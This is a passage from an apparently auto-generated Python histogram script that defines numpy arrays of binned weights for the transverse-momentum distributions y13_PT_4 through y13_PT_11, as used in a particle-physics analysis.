0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y13_PT_4
y13_PT_4_weights = numpy.array([0.0,0.0,0.125803766093,0.236813396866,0.273818275575,0.310878168056,0.314537786405,0.40708853791,0.421943458938,0.447820073609,0.347931446859,0.399719247696,0.384904309355,0.358946376513,0.395920441496,0.381114070874,0.299781619608,0.314609484682,0.310859379199,0.34039215507,0.299761177332,0.344214560074,0.27017008085,0.259023929821,0.396112087834,0.321904220713,0.355211602736,0.332986940562,0.303495951108,0.336744260966,0.307157222878,0.262638755536,0.262736156969,0.233143858,0.273845481839,0.225736088208,0.247960750382,0.233146262974,0.222036637482,0.2701666237,0.173913415252,0.177631654835,0.199880066124,0.207275059494,0.24044896548,0.173805341749,0.196184673791,0.136900555038,0.173921231417,0.181336967684,0.133215323718,0.129534556632,0.129487328961,0.114737445158,0.118503814276,0.0999140292845,0.111006474246,0.140651442138,0.0814197668407,0.118473210986,0.110987219425,0.0740681982766,0.0851136260029,0.0888341954038,0.0665784940381,0.0555107752122,0.0629130736894,0.0740029633662,0.0814061486774,0.066626563449,0.04073279831,0.055524303189,0.0444254850475,0.0406911321414,0.0443864493189,0.0665977187963,0.0333047215214,0.0370089521325,0.0295904802075,0.00740321086407,0.0296238341859,0.022199229578,0.025928982972,0.0333279595794,0.0222092402809,0.0185107665755,0.0221759313957,0.0111147120111,0.0111160798399,0.00370479277368,0.0222056177893,0.0110855186372,0.0222068202761,0.00370714814476,0.0148132759031,0.0110939886538,0.00738767473425,0.022189369186,0.00740516340205,0.0148099029275,0.0110909072813,0.00740490186117,0.0147980839851,0.0147822787988,0.00369858944476,0.00740791108445,0.011110168114,0.014813926749,0.0,0.0111173259169,0.0184891518747,0.00741379124504,0.0111051597564,0.00370835514091,0.00739627401818,0.00369801676041,0.0037037225604,0.0,0.0111091279629,0.0,0.0,0.00370564804244,0.0,0.0,0.00368965797384,0.00369868263749,0.0,0.0,0.0,0.00370323405013,0.0037037225604,0.0,0.0,0.0,0.00369887503538,0.00741044081612,0.00369613336541,
0.0,0.00738969791834,0.00741129157555,0.00370479277368,0.0,0.0,0.00369082288296,0.00369801676041,0.00369613336541,0.00370448313332,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00370503627726,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00369801676041,0.0,0.00370564653933,0.0,0.0,0.00368965797384,0.0,0.00368965797384,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00370564804244,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00369535776141,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00370835514091,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00370047885219,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00369858944476,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y13_PT_5
y13_PT_5_weights = numpy.array([0.0,0.0,0.0416079935461,0.0822384478336,0.10588608742,0.123838234077,0.120030960908,0.120062574777,0.138022823708,0.13894117136,0.165465973163,0.131365921046,0.139867216171,0.13138454127,0.148393568326,0.135152338364,0.153136113895,0.147445557352,0.128534461652,0.107754801706,0.124757436969,0.132345905991,0.126681801869,0.121933059561,0.128560809044,0.134233930696,0.135182256758,0.114407188101,0.111528435438,0.122894814391,0.107760653348,0.103992511158,0.0973601253742,0.0860244900463,0.100183857601,0.0907577330058,0.0794141004342,0.0794206272654,0.0765850867256,0.0822454848079,0.0614193268173,0.0690108566983,0.0652236441573,0.0567203084599,0.0680630707873,0.0633472627194,0.0614411579423,0.0604766873502,0.0538786311984,0.0529457594717,0.0548123731692,0.0661677690411,0.0510684177644,0.0368687188944,0.0415982558141,0.0491615477726,0.0434895064237,0.0463361500785,0.0425517283205,0.0311986881095,0.0293011357319,0.0330871929488,0.0368743004603,0.0311953721792,0.0283536499051,0.0292955991785,0.0226859297685,0.0208111987937,0.0273997422766,0.0217425700994,0.0179593036654,0.0236339107342,0.0208028414489,0.017022080718,0.0179604739938,0.0151307400831,0.0160618113047,0.015122712831,0.0179611791916,0.00850377532072,0.00850247595617,0.00850541077957,0.00472834558548,0.0122886261992,0.0122862765399,0.00944943813605,0.0056736137901,0.0103986629507,0.00661478434508,0.00756294986257,0.00944937961964,0.00189229190175,0.0047244594952,0.00378277429583,0.00378267376763,0.00283813326718,0.0066238063763,0.00661352249105,0.00188873440366,0.00377848159147,0.0,0.00567553132808,0.00378273078362,0.00189165272243,0.00472294407003,0.00189064593996,0.00189002176484,0.00473250025112,0.00094712047429,0.00283383005987,0.0,0.000945468960941,0.003783444984,0.000945490567002,0.00189377131682,0.000949241319314,0.00094518253058,0.00189290407351,0.0009447702149,0.0,0.00188862187209,0.00188920853668,0.00283383005987,0.00189338270779,0.000945336773854,0.0,0.0,0.0009447702149,
0.000949241319314,0.000943555023966,0.0,0.0,0.00188886343986,0.0,0.00188867138598,0.0,0.00283532898041,0.0,0.000944141088393,0.00094366770558,0.0,0.0,0.0,0.000946146250961,0.0,0.000945323270066,0.0018902408263,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000945323270066,0.0,0.0,0.0,0.0,0.0,0.000945699725684,0.000945699725684,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00189076747406,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000944843135359,0.00188899097565,0.0,0.000944530597673,0.0,0.000945323270066,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000946217370915,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y13_PT_6
y13_PT_6_weights = numpy.array([0.0,0.0,0.0161275102588,0.0268234986297,0.0418405165108,0.0568815386952,0.0407784113801,0.0514937479017,0.0494016283533,0.0515434585157,0.0547649012422,0.0429722015054,0.0536869382006,0.0655233502872,0.0601176396797,0.0493921435982,0.0461988552239,0.0579835322824,0.0709283486009,0.0697660724593,0.0525999777629,0.0590649818149,0.0730850244669,0.0461579920495,0.0494060895622,0.0343677216098,0.0536564220319,0.0333113823104,0.0354145836518,0.0354068533889,0.0343167251179,0.0354386741801,0.0257240168156,0.0322111619601,0.0343494643933,0.0257604600191,0.0300271977411,0.0224927969186,0.0268182688932,0.0204022331699,0.0279351494221,0.0236158706553,0.0203779177067,0.0182399076889,0.028999368941,0.0193558584869,0.0193294061421,0.0182320612096,0.0268073932905,0.0236089014221,0.0150642692068,0.0171744322835,0.015021749012,0.0214850623032,0.0182229850862,0.0161079184286,0.00646091023671,0.0203996876566,0.0118248429346,0.0150248006288,0.0171666045488,0.00858014568789,0.0139540055129,0.00964336799533,0.0107534929793,0.0075220818876,0.00967138738662,0.0107506625484,0.0107293274727,0.00751063644987,0.00858406705306,0.0064533224326,0.0118168015118,0.0118114255676,0.00644804021125,0.00643392554598,0.00751657848027,0.00536885502341,0.00429879844379,0.00429136059627,0.00537068824289,0.00428757419205,0.00644537098372,0.00430281353184,0.00430549400612,0.00321833300145,0.00429396609225,0.00215233687175,0.00430256610344,0.00644370271651,0.00321916451082,0.00215457234981,0.00107673264759,0.00429441221315,0.00322081703258,0.00215096814285,0.00107728636235,0.0,0.0,0.00107418863382,0.00213902972279,0.0,0.0021521006901,0.00215473467783,0.0,0.00107318917306,0.00107414777065,0.0,0.00215138577199,0.0,0.00106702670646,0.00106790582704,0.00107673264759,0.0010736821554,0.00107719713817,0.00107719713817,0.00107418863382,0.0,0.0,0.00107914769869,0.00107318917306,0.0,0.00107318917306,0.00106738285339,0.0,0.00106938289958,0.0,0.00214973474979,0.00107673264759,0.001074147770
65,0.0,0.0,0.0,0.0,0.00429746383002,0.00322462330606,0.0,0.00107558660425,0.0,0.0,0.0,0.0010736821554,0.0,0.00107418863382,0.0,0.00107414777065,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00107414777065,0.0,0.0,0.0,0.00214993381718,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0010684108059,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y13_PT_7
y13_PT_7_weights = numpy.array([0.0,0.0,0.0021871801519,0.00299713977265,0.00444646096453,0.00453647638499,0.00486105901594,0.00534800761375,0.00452929727959,0.00631305822787,0.00469156894997,0.00664378427454,0.00550445333323,0.00518235855776,0.00606334228775,0.00477835000113,0.0049401879077,0.0045361070571,0.00332132792999,0.00397030459894,0.00396853025349,0.0038073932841,0.00356340585518,0.00323955245035,0.00315919770434,0.00429248424124,0.00307810587417,0.00234294850833,0.00275350909875,0.0038069422326,0.00267234340301,0.00267394329997,0.00218692083658,0.00290866452805,0.00267274259144,0.00186388466791,0.00194361391393,0.00202331015618,0.0023480829517,0.00243047135847,0.00210588715591,0.00234919565017,0.00234989973056,0.00194364534609,0.00170134896739,0.00243118644012,0.00218117189447,0.00129536804271,0.00145781180416,0.0012963900594,0.00162013140858,0.00178180743952,0.00145868200352,0.00105378313096,0.0017013128204,0.00137729895439,0.00137676617927,0.00137691139585,0.0012152213776,0.000972915883577,0.00121513431052,0.0012153188173,0.0012148705947,0.000809472579428,0.000647621785677,0.000971614120661,0.00081047337941,0.00113416160824,0.000890826239487,0.000728841544733,0.000890623344892,0.000243179622403,0.000405051004218,0.000890708211725,0.000729075557166,0.00105241551766,0.000324589231706,0.000243013503436,0.000243294664109,0.000641646060536,0.000405333265017,0.000242677493643,0.000324352233218,0.000810245024766,0.00024299668723,0.000323939057472,0.000324029896415,0.00032386802079,0.000324193500809,0.000404628555985,0.000566567045463,0.0,0.000486509019049,0.00024276126035,0.0,0.000242740043642,0.000404708236511,0.000404820763645,0.000324013551692,0.000485976243933,0.000404787602716,0.000162179416986,0.000324335417012,8.0935329438e-05,0.000161913029428,0.000404877184372,8.09765527161e-05,8.10532629032e-05,0.000324426255955,0.000485586485146,0.000161800973777,0.000161931417242,0.000161901242368,0.000323991863501,0.000242871272911,8.10323133684e-05,0.000243214512
1,0.000162061389224,0.0,0.000162259568994,0.00016181134639,0.000162063903797,8.09776214096e-05,0.000324320172415,0.000161968192869,8.09765527161e-05,8.09752325654e-05,0.000404644586387,0.000162039072391,8.12819475849e-05,0.000243123515997,8.12074847973e-05,0.0,8.07223136882e-05,8.07223136882e-05,0.000243239500668,0.000161934560458,0.0,0.000243243115366,0.0,0.0,0.0,8.12074847973e-05,0.0,8.10351579789e-05,0.0,8.08362867011e-05,0.0,0.0,8.09211849659e-05,0.0,0.0,0.0,0.0,8.08337249801e-05,8.08337249801e-05,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,8.11095107539e-05,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,8.09938718364e-05,0.0,8.09938718364e-05,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,8.07223136882e-05,0.0,0.0,0.0,8.0935329438e-05,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,8.09211849659e-05,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y13_PT_8
y13_PT_8_weights = numpy.array([0.0,0.0,0.000213065253097,0.000212802267456,0.000639311243562,0.000425833944364,0.00138280667362,0.000531402160305,0.00106379055852,0.000741113358129,0.000639150879674,0.000636853444244,0.000633163404353,0.000319452104416,0.000318190909252,0.00010653034359,0.000745845206476,0.000319605173975,0.000633945178309,0.000638855208755,0.000425782828374,0.0,0.000426393213424,0.000319823558409,0.000106490252618,0.000532625825865,0.000213060742862,0.000319377212253,0.000528389156705,0.000318429951673,0.0,0.000106490252618,0.000212980560918,0.00053102948131,0.0,0.000106609745988,0.000318960377507,0.000212872092566,0.000319332611046,0.0,0.000212912183538,0.0,0.000106609745988,0.0,0.0,0.000319025302609,0.000106381839948,0.000106609745988,0.000212763624213,0.000106381839948,0.000213293159137,0.000106683413149,0.0,0.000106609745988,0.0,0.000213100054288,0.000106490252618,0.000106490252618,0.000213366826298,0.000106381839948,0.0,0.000106609745988,0.000106609745988,0.000212995427987,0.0,0.0,0.0,0.000104897750115,0.000425932835428,0.0,0.0,0.0,0.0,0.0,0.000212802267456,0.000213065253097,0.000106490252618,0.000319481838553,0.0,0.000106683413149,0.0,0.000106381839948,0.0,0.0,0.0,0.0,0.0,0.000106490252618,0.0,0.0,0.0,0.0,0.000207938230265,0.0,0.0,0.000106381839948,0.0,0.000105748235543,0.0,0.0,0.0,0.000106683413149,0.0,0.0,0.0,0.0,0.0,0.000106683413149,0.0,0.000106312014838,0.0,0.0,0.000106609745988,0.0,0.000105748235543,0.000106609745988,0.0,0.0,0.0,0.0,0.0,0.000105949525632,0.0,0.0,0.0,0.0,0.0,0.0,0.000106312014838,0.0,0.0,0.0,0.000106381839948,0.0,0.00010653034359,0.0,0.0,0.000106490252618,0.0,0.0,0.000106490252618,0.0,0.0,0.0,0.0,0.0,0.0,0.00010560936487,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000106312014838,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000106381839948,0.0,0.0,0.0,
0.000106381839948,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y13_PT_9
y13_PT_9_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y13_PT_10
y13_PT_10_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,3.95485645769,0.0,0.0,0.0,3.94542685761,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,3.948593127,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y13_PT_11
y13_PT_11_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.864704003404,0.864567251347,0.0,0.861387369757,3.45748250094,0.0,1.73006049712,0.0,0.0,0.0,1.72887886713,0.0,1.72902729139,2.5870866435,0.86224506021,3.45412206052,0.861387369757,1.72563226668,0.861387369757,1.72956334792,1.72618993839,0.0,0.0,0.0,1.72796670642,0.0,0.0,1.72550401659,3.45722311874,3.4555385755,0.862981993841,0.862575628405,0.863198433872,2.59508426113,0.864105983346,1.7300691432,0.864567251347,2.59198752594,0.864823751516,2.59005801063,0.864823751516,0.0,0.864919578827,0.863198433872,1.72789033277,0.862434409211,1.72577348587,0.865644552057,1.7260962726,0.0,2.59120505633,0.0,0.0,2.59159124759,0.0,0.0,0.0,0.0,0.0,0.863850635987,0.0,0.864704003404,0.862434409211,0.0,0.862575628405,0.862321722058,0.0,0.0,0.0,0.865024340412,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.862981993841,0.0,0.0,0.0,0.0,0.865024340412,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,